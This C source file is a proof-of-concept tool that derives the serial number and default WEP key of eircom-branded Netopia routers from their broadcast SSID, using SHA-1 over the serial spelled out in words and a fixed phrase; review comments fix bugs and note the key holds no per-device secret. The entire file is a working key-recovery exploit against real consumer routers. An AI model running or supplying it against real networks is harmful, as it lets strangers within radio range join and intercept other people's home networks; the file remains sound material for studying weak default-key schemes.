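/*******************************************************************************
 *
 * This is a simple program which displays the serial number and corresponding
 * WEP key for a Netopia router when supplied with a default SSID.
 *
 * The authors cannot accept responsibility for misuse of this software.
 * It is provided only as a proof of concept tool.
 *
 * 20/03/08 - code cleaned up
 *          - now only decodes SSID, displaying first default key.
 *          - anyone who wants full source code should look at the GUI version
 *          - or Tomas's eirwep code
 *
 * 30/09/07 - www.pixelbeat.org - added linux support.
 *            To compile on unix: gcc dessid.c -l crypto -o dessid
 *
 * 21/09/07 - removed obsolete stuff, added new SSID routine and technical
 *            details of flaw
 *
 * 20/09/07 - re-write whole program
 * 19/09/07 - reversed binaries, first badly written demo
 *
 *******************************************************************************/

/*
 * NOTE(review): the header names were missing from this listing; the three
 * standard headers and <openssl/sha.h> below are restored from the functions
 * the code calls and from the "-l crypto" build line above. Confirm against
 * the original file.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * `linux` is only predefined by GCC in its GNU dialect modes (the default);
 * a strict -std=c99/-std=c11 build takes the sha1.h branch instead.
 */
#ifdef linux
#include <openssl/sha.h>
#define SHA1Init        SHA1_Init
#define SHA1Update      SHA1_Update
#define SHA1Final(x,y)  SHA1_Final(y,x)
#define SHA1_CTX        SHA_CTX
#else
#include "sha1.h"
#define SHA1Init        SHA1Reset
#define SHA1Update      SHA1Input
#define SHA1Final       SHA1Result
#define SHA1_CTX        SHA1Context
#endif

#define MAX_SSID_OCTETS   8
#define MAX_SERIAL_NUMBER 16
#define DEFAULT_KEY_SIZE  13

/* Sentinel returned by str2ssid(); a valid SSID never exceeds 24 bits. */
#define INVALID_SSID      ((u32)-1)

typedef unsigned int   u32;
typedef unsigned short u16;
typedef unsigned char  u8;

/* The longest word is five letters, which bounds formatSerial()'s output. */
const u8 *strDigits[10]={"Zero","One","Two","Three","Four",
                         "Five","Six","Seven","Eight","Nine"};

/*
 * The serial number is converted to its ascii word format,
 * e.g "123" becomes "OneTwoThree".
 *
 * output  NUL-terminated buffer the words are appended to; it must have room
 *         for MAX_SERIAL_NUMBER * 5 more characters plus the terminator.
 * number  NUL-terminated decimal serial number.
 *
 * Returns the length of output after appending, or 0 when the serial number
 * is empty, longer than MAX_SERIAL_NUMBER, or contains a non-digit. The
 * input is validated before anything is written, so a rejected serial
 * leaves output untouched (previously a serial such as "12a" was silently
 * truncated to "12").
 */
u32 formatSerial(u8 *output, u8 *number)
{
    size_t len = strlen((const char *)number);
    const u8 *p;

    if (len == 0 || len > MAX_SERIAL_NUMBER)
        return 0;

    for (p = number; *p != '\0'; p++) {
        if (*p < '0' || *p > '9')
            return 0;
    }

    for (p = number; *p != '\0'; p++)
        strcat((char *)output, (const char *)strDigits[*p - '0']);

    return (u32)strlen((const char *)output);
}

/*
 * Convert the octal SSID to binary.
 *
 * str  NUL-terminated string of octal digits (the SSID without its prefix).
 *
 * Returns the decoded value, or INVALID_SSID ((u32)-1) when the string is
 * empty, has an odd length, is longer than MAX_SSID_OCTETS, or contains a
 * character outside '0'..'7'. The digits '8' and '9' are rejected: each
 * position only contributes three bits, so accepting them would spill into
 * the neighbouring octal digit and decode to the wrong serial number.
 */
u32 str2ssid(u8 *str)
{
    size_t len = strlen((const char *)str);
    const u8 *p;
    u32 ssid = 0;

    if (len == 0 || (len % 2) || len > MAX_SSID_OCTETS)
        return INVALID_SSID;

    for (p = str; *p >= '0' && *p <= '7'; p++)
        ssid = (ssid << 3) + (u32)(*p - '0');

    /* Stopping before the terminator means a non-octal character was hit. */
    return ((size_t)(p - str) == len) ? ssid : INVALID_SSID;
}

/*
 * Generate the first default WEP key for Netopia routers.
 *
 * strKey  output buffer of at least DEFAULT_KEY_SIZE * 2 + 1 bytes; receives
 *         the key as lowercase hex, NUL-terminated.
 * serial  NUL-terminated decimal serial number.
 *
 * Returns strKey, or a pointer to a static error message when the serial
 * number is rejected by formatSerial().
 *
 * Every input to the hash is either the constant phrase below or the serial
 * number, which main() derives from the SSID alone, so the default key holds
 * no per-device secret. Devices still running with it need a freshly chosen
 * key (and, where the hardware allows, a move off WEP).
 */
u8 *genWepKey(u8 *strKey, u8 *serial)
{
    u8 words[256] = {0};
    u8 sha1_digest[20 + 1] = {0};
    SHA1_CTX sha1_ctx;
    u32 len;
    u32 i;

    len = formatSerial(words, serial);
    if (len == 0)
        return (u8 *)"Invalid serial number";

    SHA1Init(&sha1_ctx);
    SHA1Update(&sha1_ctx, words, len);
    SHA1Update(&sha1_ctx, (const u8 *)"Although your world wonders me, ", 32);
    SHA1Final(&sha1_ctx, sha1_digest);

    /* Two hex characters per digest byte; snprintf adds the terminator. */
    for (i = 0; i < DEFAULT_KEY_SIZE; i++)
        snprintf((char *)&strKey[i * 2], 3, "%.2x", sha1_digest[i]);

    return strKey;
}

/* Print the command-line help and terminate the program. */
void usage(char **argv)
{
    fprintf(stdout, "\n\tUsage:%s with \"eircom\" string omitted.\n"
                    "\n\t e.g: %s 31361731\n", *argv, *argv);
    exit(0);
}

/*
 * Decode the SSID given as the only argument, derive the serial number and
 * print it together with the first default WEP key.
 */
int main(int argc, char **argv)
{
    u32 ssid = 0;
    u8 digits[MAX_SERIAL_NUMBER + 1] = {0};
    /* +1 for the terminator: the original 26-byte buffer was overrun by one
     * byte when the last hex pair was written. */
    u8 strKey[DEFAULT_KEY_SIZE * 2 + 1] = {0};

    if (argc != 2)
        usage(argv);

    /* convert the SSID into binary */
    ssid = str2ssid((u8 *)argv[1]);
    if (ssid == INVALID_SSID)
        usage(argv);

    /*
     * Exclusive-OR the Netopia Inc. OUI ID against the 2nd octet
     * add 0x01000000 because SSID routine only processes 24-bits of serial number
     *
     * The value is passed as unsigned long to match the conversion; the
     * original paired "%ld" with an unsigned int argument.
     */
    snprintf((char *)digits, sizeof digits, "%lu",
             (unsigned long)((ssid ^ 0xFCC) + 0x01000000));

    fprintf(stdout, "\nWEP key for serial number: %s = %s\n\n",
            (char *)digits, (char *)genWepKey(strKey, digits));

    return 0;
}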